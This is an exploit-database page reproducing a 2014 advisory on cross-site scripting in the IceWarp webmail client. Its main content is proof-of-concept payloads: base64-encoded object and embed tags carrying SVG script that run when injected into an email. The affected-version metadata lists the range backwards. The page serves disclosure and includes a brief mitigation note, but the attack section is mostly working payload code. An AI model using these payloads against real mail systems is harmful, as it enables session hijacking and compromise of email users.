header-logo
Suggest Exploit
vendor:
IceWarp Client
by:
Usman Saeed
8,8
CVSS
HIGH
Cross Site Scripting (XSS)
79
CWE
Product Name: IceWarp Client
Affected Version From: 11.0.0.0
Affected Version To: 10.3.4
Patch Exists: NO
Related CWE: N/A
CPE: a:icewarp:icewarp_client
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mozilla Firefox 26.0
2014

Cross Site Scripting (XSS) in ICEWARP Client

It is possible to inject malicious HTML Elements into the email and cause a Cross site Scripting (XSS) payload to be executed.

Mitigation:

Ensure that all user-supplied input is properly sanitized and validated before being used in the application.
Source

Exploit-DB raw data:

Disclaimer:
[This code is for Educational Purposes , I would Not be responsible  
for any misuse of this code]

Attack type : Remote
Patch Status : Unpatched
Exploitation :
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# Twitter : http://twitter.com/emuess
# Original Advisory DATE: [29/01/2014]
# Publishing of Exploit Date : [17/02/2014]

Description
===========
It is possible to inject malicious HTML Elements into the email and  
cause a Cross site Scripting (XSS) payload to be executed.

Tested ICEWARP Client Versions (http://www.icewarp.com/)
============================
Version : 11.0.0.0 (2014-01-25) x64
& 10.3.4

Browser Used
=============
Mozilla Firefox 26.0

Proof Of Concept
============
Please find the details about the exploit : http://xc0re.net/blog/?p=363

Proof Of Concept
=================
For Version: ICEWARP 11.0.0

><object data=”data:text/html;base64,PC9zY3JpcHQ+PGltZyBzcmM9Ing6eCIgb25lcnJvcj0iYWxlcnQoU3RyaW5nLmZyb21DaGFyQ29kZSg4OCwxMTUsMTE1KSkiIC8+”></object>>

><EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>>

Note:

For Version: ICEWARP 10.3.4

<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>

Navigation

Suggest Exploit

Services By CQR